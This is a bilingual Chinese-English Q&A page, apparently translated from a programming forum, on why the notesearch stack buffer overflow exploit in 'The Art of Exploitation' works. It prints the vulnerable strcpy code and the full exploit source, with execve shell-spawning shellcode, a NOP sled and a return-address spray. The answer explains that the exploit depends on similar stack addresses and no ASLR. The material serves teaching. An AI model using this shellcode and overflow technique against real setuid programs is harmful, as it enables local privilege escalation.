本文介绍了剥削艺术书中的缓冲区溢出示例的处理方法,对大家解决问题具有一定的参考价值,需要的朋友们下面随着小编来一起学习吧!

问题描述

我正在阅读《剥削的艺术》(Art of Exploitation),这是一本不错的书,我从exploit_notesearch.c文件中浏览了该示例。

I was reading this book Art of Exploitation, which is kinda good book and I run across that example from exploit_notesearch.c file.

简而言之,作者试图溢出程序来自notesearch.c

Briefly author tries to overflow program from notesearch.c

int main(int argc, char *argv[]) {
    int userid, printing=1, fd;
    char searchstring[100];
    if(argc > 1) // If there is an arg
        strcpy(searchstring, argv[1]);
    else // otherwise,
        searchstring[0] = 0;

将主函数的参数复制到searchstring数组中,如果该参数大于100个字节

The argument of the main function is copied to the searchstring array and if the argument is bigger than 100 bytes it will overflow the return address from the main function.

作者在exploit_notesearch.c中准备shellcode并调用易受攻击的notesearch.c

The author prepares the shellcode in exploit_notesearch.c and calls vulnerable notesearch.c

char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";

int main(int argc, char *argv[]) {

    unsigned int i, *ptr, ret, offset=270;
    char *command, *buffer;

    command = (char *) malloc(200);
    bzero(command, 200);

    strcpy(command, "./notesearch \'");
    buffer = command + strlen(command);

    ret = (unsigned int) &i - offset; // Set return address

    for(i=0; i < 160; i+=4) // Fill buffer with return address
        *((unsigned int *)(buffer+i)) = ret;
    memset(buffer, 0x90, 60); // Build NOP sled
    memcpy(buffer+60, shellcode, sizeof(shellcode)-1);

    strcat(command, "\'");

    system(command); //run exploit
}

您可以看到shellcode与NOP底座组合并返回应该指向该NOP雪橇的地址。作者使用局部变量i的地址作为参考点,并减去270个字节,因此试图找出NOP底座的大致位置。

You can see that shellcode is combined with NOP sled and return address which should point to that NOP sled. The author uses address of a local variable i as a point of reference and substracts 270 bytes thus trying figure out approximate location of NOP sled.

据我所知,作者假定堆栈框架易受攻击的notesearch.c中的主要功能的堆栈将与exploit_notesearch.c中的主要功能的堆栈框架位于同一堆栈段中。我以为是因为只有这样,我才能使用局部变量的地址进行这种操作。

As I understand author assumes that stackframe of the main function from vulnerable notesearch.c will be in the same stack segment as stackframe of main function from exploit_notesearch.c. I assume this because only this way this manipulation with address of the local variable i can work.

但是,作者借助系统调用了易受攻击的notesearch.c( ),就像这个系统(命令)一样。我的观点是,此函数内部的system()使用fork()生成子进程,然后使用exec()函数更改该进程的映像。但是,如果映像发生更改,则意味着堆栈段将是新鲜的,并且exploit_notesearch.c中主要函数中带有局部变量i地址的所有这些操作将无用,但是以某种方式使此利用有效,这完全让我感到困惑。

But, the author calls vulnerable notesearch.c with the help of the system() like this system(command). My point is that this function system() somewhere inside uses fork() to spawn child process and after that uses exec() function to change image of the process. But if the image is changed it means that stack segment will be fresh and all those manipulations with address of local variable i in main function in exploit_notesearch.c will be useless, but somehow this exploit works which is completely confusing for me.

推荐答案

作者只是假定C编译器会将这两个程序的堆栈放在相同(或非常相似)的虚拟地址并且该操作系统将不会执行。这意味着两个主要功能的堆栈框架将大致位于同一位置,从而启用此漏洞利用。

The author simply assumes that the C compiler will place the stacks of those two programs at the same (or very similar) virtual addresses and that the operating system will not perform address randomization (ASLR). This means that the stack frames of both main functions will be roughly at the same location, enabling this exploit.

这不是一种非常可靠的漏洞利用方法,因为您可以想象一下(在大多数现代64位系统上可能会失败)。更强大的漏洞利用可以使用的形式,或者可以尝试利用现有的 char * argv 指向相关堆栈框架的指针。

This is not a very robust way of exploitation, as you can imagine (it will probably fail on most modern 64-bit systems). More robust exploits could use a form of return oriented programming or could try to utilize the existing char *argv pointer to the relevant stack frame.

这篇关于剥削艺术书中的缓冲区溢出示例的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持!

08-06 23:28